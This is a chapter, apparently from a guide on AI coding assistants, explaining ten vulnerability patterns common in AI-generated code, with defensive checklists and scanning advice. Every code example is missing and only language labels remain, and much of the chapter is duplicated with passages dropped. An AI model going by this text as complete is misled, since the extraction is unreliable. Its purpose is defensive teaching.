Vulnerable Code Generation Patterns

In Chapter 1, we explored how sensitive data can leak through AI coding assistants. Now we're tackling an even more fundamental problem: AI tools regularly generate code that contains security vulnerabilities.

Here's the uncomfortable truth: AI coding assistants are trained on billions of lines of public code — and much of that code is insecure. When AI generates code, it reproduces the patterns it learned, including the vulnerable ones. The result? Around 48% of AI-generated code contains security vulnerabilities ¹.

This chapter explores why AI generates vulnerable code, what specific vulnerability patterns appear most frequently, and how to catch and fix them before they reach production.

The Core Problem: Pattern Matching Without Security Understanding

AI coding assistants work through statistical pattern matching. They've seen thousands of examples of authentication code, database queries, API endpoints, and file operations. When you ask them to generate similar code, they produce what statistically "looks right" based on their training data.

But here's the critical issue: AI doesn't understand security intent. It doesn't reason about threat models, attack vectors, or security boundaries. It generates code that looks functionally correct without considering whether it's secure.

Think of it like this: If you trained someone to cook by showing them thousands of random cooking videos from the internet — some from professional chefs, many from amateurs, and some showing outright dangerous practices — they'd learn to make dishes that look like food. But they might also reproduce unsafe food handling practices because those appeared frequently in the training data.

That's exactly what's happening with AI-generated code.

The Research: How Bad Is It Really?

Before we dive into specific vulnerability patterns, let's look at what research tells us about the scope of this problem:

Key Findings from Academic Studies

Multiple studies point to a consistent pattern: AI assistance increases the speed of coding but also the likelihood that security flaws slip in. A 2024 large-scale comparison found roughly half of AI-generated snippets contained exploitable vulnerabilities, with SQL injection and path traversal among the most common ¹. A 2023 controlled study showed developers using assistance were more likely to introduce vulnerabilities—and to trust the output—resulting in measurably less secure code overall ². A 2024 systematic review across models observed persistently high vulnerability rates even for stronger models in security‑critical scenarios ³. Earlier work analyzing Copilot outputs found around 40% of suggestions had security weaknesses, especially around auth, crypto, and input handling ⁴.

The False Security Effect

Perhaps most concerning is the trust gap: many developers feel AI output is safer than it is. Surveys indicate strong perceived security benefits, yet empirical analyses consistently show the opposite—AI code often needs more scrutiny, not less. This over‑confidence leads reviewers to skim rather than challenge suggestions, letting issues through ⁵.

This creates a perfect storm: vulnerable code being generated at scale and accepted without adequate review.

The Top 10 Vulnerable Code Patterns AI Generates

Let's explore the most common security vulnerabilities that appear in AI-generated code, with real examples and fixes.

Vulnerability Overview

Rank	Vulnerability	Severity	Why AI Generates This
🥇	SQL Injection	🔴 CRITICAL	String-building for queries is ubiquitous in training data
🥈	Missing Auth/Authz	🔴 CRITICAL	Prompts focus on functionality, not security boundaries
🥉	Command Injection	🟠 HIGH	Training examples interpolate input into shell commands
4	Path Traversal	🟠 HIGH	File operations rarely include validation in examples
5	Insecure Deserialization	🟠 HIGH	Security implications aren't obvious in library examples
6	Missing Input Validation	🟠 HIGH	AI focuses on "happy path" logic
7	Cross-Site Scripting (XSS)	🟡 MEDIUM	Output encoding often omitted in templates
8	Weak Cryptography	🟡 MEDIUM	Training data includes outdated algorithms
9	Hardcoded Secrets	🟡 MEDIUM	Fake examples in training look like real patterns
10	Poor Error Handling	🔵 LOW	"Happy path" bias omits edge cases

Key Finding: Research shows SQL injection and path traversal are the most frequently occurring vulnerabilities in AI-generated code, with authentication/authorization issues close behind ¹.

1. SQL Injection (Most Common)

Why this happens: String‑building for queries is ubiquitous online, so assistants reproduce it—even though parameterization is the secure default.

Vulnerable code (AI-generated):

python

This allows an attacker to manipulate username and execute arbitrary SQL:

python

Secure version:

python

Parameterization cleanly separates SQL logic from user data, preventing injection.

2. Missing Authentication & Authorization

Why this happens: Prompts emphasize functionality (“create an endpoint”) while security boundaries (who can call it? for which resource?) are often unstated and therefore omitted.

Vulnerable code (AI-generated):

javascript

Without explicit checks, anyone can call the endpoint, update other users, and even escalate privileges by changing roles.

Secure version:

javascript

3. Command Injection

Why this happens: Many examples interpolate untrusted input into shell commands; assistants mirror that pattern.

Vulnerable code (AI-generated):

python

The problem: An attacker can inject shell commands:

python

Secure version:

python

4. Path Traversal / Directory Traversal

Why AI generates this: File operations with user input are common, and proper validation is often omitted in training data.

Vulnerable code (AI-generated):

python

The problem: Attacker can access any file:

python

Secure version:

python

5. Insecure Deserialization

Why AI generates this: Serialization libraries are widely used, and security implications aren't obvious in code examples.

Vulnerable code (AI-generated):

python

The problem: Pickle can execute arbitrary code during deserialization. An attacker can craft malicious serialized data that executes code on the server.

Secure version:

python

6. Missing Input Validation

Why AI generates this: AI focuses on the "happy path" and often omits validation logic.

Vulnerable code (AI-generated):

javascript

The problems:

No validation that amount is positive (can transfer negative amounts to steal money)
No check for sufficient balance
No validation of account IDs
No rate limiting
No transaction atomicity

Secure version:

javascript

7. Cross-Site Scripting (XSS)

Why AI generates this: Templating and output generation code often omits proper escaping.

Vulnerable code (AI-generated):

javascript

The problem: User-supplied data is inserted directly into HTML without escaping.

javascript

Secure version:

javascript

8. Insecure Cryptography

Why AI generates this: Cryptography examples in training data often use outdated or weak algorithms.

Vulnerable code (AI-generated):

python

The problems:

MD5 is cryptographically broken
No salt (same password = same hash)
Fast hashing enables brute force attacks
Rainbow tables can crack these instantly

Secure version:

python

9. Hardcoded Secrets & Credentials

Why AI generates this: Training data contains countless examples with hardcoded credentials (often fake examples that look real).

Vulnerable code (AI-generated):

python

The problems:

API key is committed to version control
Anyone with code access has production credentials
Key rotation requires code changes
Keys can leak through logs, error messages, or Stack Overflow posts

Secure version:

python

10. Missing Error Handling & Information Disclosure

Why AI generates this: AI generates the "happy path" logic but often omits comprehensive error handling.

Vulnerable code (AI-generated):

python

The problems:

No error handling for invalid user_id
Database errors expose stack traces to users
Exception messages may contain sensitive information
No logging for debugging

Secure version:

python

Why These Patterns Keep Appearing

Understanding why AI generates these vulnerable patterns helps us address the root causes:

1. Training Data Contains Vulnerable Code

The internet is full of insecure code examples. Stack Overflow answers, tutorial blogs, GitHub repositories — many contain vulnerabilities. When AI trains on this data, it learns both good and bad patterns.

2. Security is Context-Dependent

What's secure in one context may be insecure in another. AI lacks the contextual understanding to know when security controls are needed. A code snippet that's fine for a local script becomes dangerous in a public API.

3. The "Happy Path" Bias

Training data disproportionately shows functional code, not defensive code. Examples focus on making things work, not on edge cases, error handling, or security boundaries.

4. No Threat Modeling

AI doesn't think like an attacker. It doesn't ask "how could this be abused?" or "what if the user is malicious?" It generates code that assumes good-faith inputs.

5. Implicit Assumptions

Secure code often relies on implicit context: middleware, frameworks, environment configuration. AI generates isolated code snippets without these protective layers.

How to Catch Vulnerable AI Code Before It Ships

Now that you know what to look for, here's how to systematically catch these issues:

1. Code Review Checklist for AI-Generated Code

When reviewing AI-generated code, explicitly check:

Authentication & Authorization:

Does this endpoint/function require authentication?
Are there authorization checks for resource access?
Can users access resources they don't own?
Can users escalate their privileges?

Input Validation:

Are all inputs validated (type, range, format)?
Is there sanitization for special characters?
Are file uploads restricted by type and size?
Are there rate limits to prevent abuse?

SQL & Command Injection:

Are database queries parameterized?
Are shell commands avoided or properly escaped?
Is user input ever concatenated into queries/commands?

Output Encoding:

Is user data escaped before displaying in HTML?
Are there XSS protections in place?
Is Content-Security-Policy configured?

Cryptography:

Are modern, secure algorithms used (bcrypt, argon2, not MD5/SHA1)?
Is sensitive data encrypted at rest and in transit?
Are secrets stored in environment variables, not code?

Error Handling:

Are errors caught and logged appropriately?
Do error messages reveal sensitive information?
Are stack traces hidden from users?

Session Management:

Secure cookies (httpOnly, secure, sameSite), sensible timeouts, strong/random session IDs

2. Automated Security Scanning

Integrate these tools into your workflow:

Static Application Security Testing (SAST):

Semgrep — Fast, customizable pattern matching for security issues
Snyk Code — AI-powered security analysis with fix suggestions
SonarQube — Comprehensive code quality and security scanning
Bandit (Python) — Security linting for Python code
ESLint Security Plugin (JavaScript) — Security rules for JavaScript/Node.js

IDE Integration: Many SAST tools have IDE plugins that flag issues in real-time:

Snyk plugin for VS Code
SonarLint for multiple IDEs
Semgrep extension

3. Pre-Commit Hooks

Prevent vulnerable code from being committed:

Add Bandit (Python), Semgrep, and detect-secrets hooks
Fail on high-severity findings; require fixes before commit

4. CI/CD Security Gates

Block merges if security issues are found:

Run Semgrep/Snyk/Sonar in PRs; block on critical issues
Require security review for auth/crypto changes

5. Security-Focused Prompting

Guide AI toward secure code from the start:

❌ Bad prompt:

text

✅ Good prompt:

text

Even better - use .github/copilot-instructions.md:

markdown

Real-World Incident (Condensed)

Anonymized SaaS team shipped an AI-generated data export endpoint without security review. Within two weeks:

Vulnerabilities: SQL injection, no auth/authz, path traversal, broad data exposure
Exploitation: attackers enumerated users, exfiltrated database, read secrets via file paths
Impact: 47k user records exposed (GDPR), significant fine and reputational damage
Root causes: over-trust in AI output, missing SAST gate, weak code review, no secure prompting
Preventable with: secure prompting requirements, parameterized queries, auth/authz checks, SAST in CI, senior review

Practical Defense Strategy

Use the earlier "How to Catch Vulnerable AI Code" section as the single source of truth:

Apply the review checklist
Run IDE linting, pre-commit hooks, and SAST in CI
Use security-focused prompting and repository instructions
Require senior review for AI-assisted changes

Key Takeaways

Before moving to the next chapter, make sure you understand:

48% of AI-generated code contains vulnerabilities — This isn't hypothetical; it's measured reality
Top vulnerability patterns — SQL injection, missing auth, command injection, path traversal, XSS, weak crypto
AI doesn't understand security — It pattern-matches without reasoning about threats
False security effect — Developers trust AI code more than they should
Multiple layers of defense needed — Prevention, detection, verification, validation
Secure prompting matters — Explicitly request security controls in your prompts
Automated scanning is essential — SAST, IDE linting, CI/CD gates catch what humans miss
Never skip code review — AI-generated code needs MORE scrutiny, not less
Real-world impact — Vulnerabilities reach production and cause real breaches

Sources and Further Reading

[1] arXiv (2024) – How secure is AI-generated Code: A Large-Scale Comparison of Large Language Models

[2] arXiv (2023) – Do Users Write More Insecure Code with AI Assistants?

[3] IEEE Security & Privacy (2024) – State of the Art of the Security of Code Generated by LLMs: A Systematic Literature Review

[4] arXiv (2021) – Asleep at the Keyboard? Assessing the Security of GitHub Copilot's Code Contributions

[5] Snyk (2024) – 2024 Open Source Security Report: Slowing Progress and New Challenges for DevSecOps

Additional Resources

OWASP Top 10 – https://owasp.org/www-project-top-ten/
CWE Top 25 – Common Weakness Enumeration for software vulnerabilities
Semgrep Rules – Community security rules for detecting vulnerabilities
NIST Secure Software Development Framework – Guidelines for secure SDLC

This chapter explores why AI generates vulnerable code, what specific vulnerability patterns appear most frequently, and how to catch and fix them before they reach production.

The Core Problem: Pattern Matching Without Security Understanding

That's exactly what's happening with AI-generated code.

The Research: How Bad Is It Really?

Before we dive into specific vulnerability patterns, let's look at what research tells us about the scope of this problem:

Key Findings from Academic Studies

The False Security Effect

This creates a perfect storm: vulnerable code being generated at scale and accepted without adequate review.

The Top 10 Vulnerable Code Patterns AI Generates

Let's explore the most common security vulnerabilities that appear in AI-generated code, with real examples and fixes.

Vulnerability Overview

Rank	Vulnerability	Severity	Why AI Generates This
🥇	SQL Injection	🔴 CRITICAL	String-building for queries is ubiquitous in training data
🥈	Missing Auth/Authz	🔴 CRITICAL	Prompts focus on functionality, not security boundaries
🥉	Command Injection	🟠 HIGH	Training examples interpolate input into shell commands
4	Path Traversal	🟠 HIGH	File operations rarely include validation in examples
5	Insecure Deserialization	🟠 HIGH	Security implications aren't obvious in library examples
6	Missing Input Validation	🟠 HIGH	AI focuses on "happy path" logic
7	Cross-Site Scripting (XSS)	🟡 MEDIUM	Output encoding often omitted in templates
8	Weak Cryptography	🟡 MEDIUM	Training data includes outdated algorithms
9	Hardcoded Secrets	🟡 MEDIUM	Fake examples in training look like real patterns
10	Poor Error Handling	🔵 LOW	"Happy path" bias omits edge cases

Key Finding: Research shows SQL injection and path traversal are the most frequently occurring vulnerabilities in AI-generated code, with authentication/authorization issues close behind ¹.

1. SQL Injection (Most Common)

Why this happens: String‑building for queries is ubiquitous online, so assistants reproduce it—even though parameterization is the secure default.

Vulnerable code (AI-generated):

python

This allows an attacker to manipulate username and execute arbitrary SQL:

python

Secure version:

python

Parameterization cleanly separates SQL logic from user data, preventing injection.

2. Missing Authentication & Authorization

Why this happens: Prompts emphasize functionality (“create an endpoint”) while security boundaries (who can call it? for which resource?) are often unstated and therefore omitted.

Vulnerable code (AI-generated):

javascript

Without explicit checks, anyone can call the endpoint, update other users, and even escalate privileges by changing roles.

Secure version:

javascript

3. Command Injection

Why this happens: Many examples interpolate untrusted input into shell commands; assistants mirror that pattern.

Vulnerable code (AI-generated):

python

The problem: An attacker can inject shell commands:

python

Secure version:

python

4. Path Traversal / Directory Traversal

Why AI generates this: File operations with user input are common, and proper validation is often omitted in training data.

Vulnerable code (AI-generated):

python

The problem: Attacker can access any file:

python

Secure version:

python

5. Insecure Deserialization

Why AI generates this: Serialization libraries are widely used, and security implications aren't obvious in code examples.

Vulnerable code (AI-generated):

python

The problem: Pickle can execute arbitrary code during deserialization. An attacker can craft malicious serialized data that executes code on the server.

Secure version:

python

6. Missing Input Validation

Why AI generates this: AI focuses on the "happy path" and often omits validation logic.

Vulnerable code (AI-generated):

javascript

The problems:

No validation that amount is positive (can transfer negative amounts to steal money)
No check for sufficient balance
No validation of account IDs
No rate limiting
No transaction atomicity

Secure version:

javascript

7. Cross-Site Scripting (XSS)

Why AI generates this: Templating and output generation code often omits proper escaping.

Vulnerable code (AI-generated):

javascript

The problem: User-supplied data is inserted directly into HTML without escaping.

javascript

Secure version:

javascript

8. Insecure Cryptography

Why AI generates this: Cryptography examples in training data often use outdated or weak algorithms.

Vulnerable code (AI-generated):

python

The problems:

MD5 is cryptographically broken
No salt (same password = same hash)
Fast hashing enables brute force attacks
Rainbow tables can crack these instantly

Secure version:

python

9. Hardcoded Secrets & Credentials

Why AI generates this: Training data contains countless examples with hardcoded credentials (often fake examples that look real).

Vulnerable code (AI-generated):

python

The problems:

API key is committed to version control
Anyone with code access has production credentials
Key rotation requires code changes
Keys can leak through logs, error messages, or Stack Overflow posts

Secure version:

python

10. Missing Error Handling & Information Disclosure

Why AI generates this: AI generates the "happy path" logic but often omits comprehensive error handling.

Vulnerable code (AI-generated):

python

The problems:

No error handling for invalid user_id
Database errors expose stack traces to users
Exception messages may contain sensitive information
No logging for debugging

Secure version:

python

Does this endpoint/function require authentication?
Are there authorization checks for resource access?
Can users access resources they don't own?
Can users escalate their privileges?

Input Validation:

Are all inputs validated (type, range, format)?
Is there sanitization for special characters?
Are file uploads restricted by type and size?
Are there rate limits to prevent abuse?

SQL & Command Injection:

Are database queries parameterized?
Are shell commands avoided or properly escaped?
Is user input ever concatenated into queries/commands?

Output Encoding:

Is user data escaped before displaying in HTML?
Are there XSS protections in place?
Is Content-Security-Policy configured?

Cryptography:

Are modern, secure algorithms used (bcrypt, argon2, not MD5/SHA1)?
Is sensitive data encrypted at rest and in transit?
Are secrets stored in environment variables, not code?

Error Handling:

Are errors caught and logged appropriately?
Do error messages reveal sensitive information?
Are stack traces hidden from users?

Session Management:

Secure cookies (httpOnly, secure, sameSite), sensible timeouts, strong/random session IDs

2. Automated Security Scanning

Integrate these tools into your workflow:

Static Application Security Testing (SAST):

Semgrep — Fast, customizable pattern matching for security issues
Snyk Code — AI-powered security analysis with fix suggestions
SonarQube — Comprehensive code quality and security scanning
Bandit (Python) — Security linting for Python code
ESLint Security Plugin (JavaScript) — Security rules for JavaScript/Node.js

IDE Integration: Many SAST tools have IDE plugins that flag issues in real-time:

Snyk plugin for VS Code
SonarLint for multiple IDEs
Semgrep extension

3. Pre-Commit Hooks

Prevent vulnerable code from being committed:

Add Bandit (Python), Semgrep, and detect-secrets hooks
Fail on high-severity findings; require fixes before commit

4. CI/CD Security Gates

Block merges if security issues are found:

Run Semgrep/Snyk/Sonar in PRs; block on critical issues
Require security review for auth/crypto changes

5. Security-Focused Prompting

Guide AI toward secure code from the start:

❌ Bad prompt:

text

✅ Good prompt:

text

Even better - use .github/copilot-instructions.md:

markdown

Real-World Incident (Condensed)

Anonymized SaaS team shipped an AI-generated data export endpoint without security review. Within two weeks:

Vulnerabilities: SQL injection, no auth/authz, path traversal, broad data exposure
Exploitation: attackers enumerated users, exfiltrated database, read secrets via file paths
Impact: 47k user records exposed (GDPR), significant fine and reputational damage
Root causes: over-trust in AI output, missing SAST gate, weak code review, no secure prompting
Preventable with: secure prompting requirements, parameterized queries, auth/authz checks, SAST in CI, senior review

Practical Defense Strategy

Use the earlier "How to Catch Vulnerable AI Code" section as the single source of truth:

Apply the review checklist
Run IDE linting, pre-commit hooks, and SAST in CI
Use security-focused prompting and repository instructions
Require senior review for AI-assisted changes

Key Takeaways

Before moving to the next chapter, make sure you understand:

48% of AI-generated code contains vulnerabilities — This isn't hypothetical; it's measured reality
Top vulnerability patterns — SQL injection, missing auth, command injection, path traversal, XSS, weak crypto
AI doesn't understand security — It pattern-matches without reasoning about threats
False security effect — Developers trust AI code more than they should
Multiple layers of defense needed — Prevention, detection, verification, validation
Secure prompting matters — Explicitly request security controls in your prompts
Automated scanning is essential — SAST, IDE linting, CI/CD gates catch what humans miss
Never skip code review — AI-generated code needs MORE scrutiny, not less
Real-world impact — Vulnerabilities reach production and cause real breaches

Sources and Further Reading

[1] arXiv (2024) – How secure is AI-generated Code: A Large-Scale Comparison of Large Language Models

[2] arXiv (2023) – Do Users Write More Insecure Code with AI Assistants?

[3] IEEE Security & Privacy (2024) – State of the Art of the Security of Code Generated by LLMs: A Systematic Literature Review

[4] arXiv (2021) – Asleep at the Keyboard? Assessing the Security of GitHub Copilot's Code Contributions

[5] Snyk (2024) – 2024 Open Source Security Report: Slowing Progress and New Challenges for DevSecOps

Additional Resources

OWASP Top 10 – https://owasp.org/www-project-top-ten/
CWE Top 25 – Common Weakness Enumeration for software vulnerabilities
Semgrep Rules – Community security rules for detecting vulnerabilities
NIST Secure Software Development Framework – Guidelines for secure SDLC

Safe AI Code Assistants in Production

Vulnerable Code Generation Patterns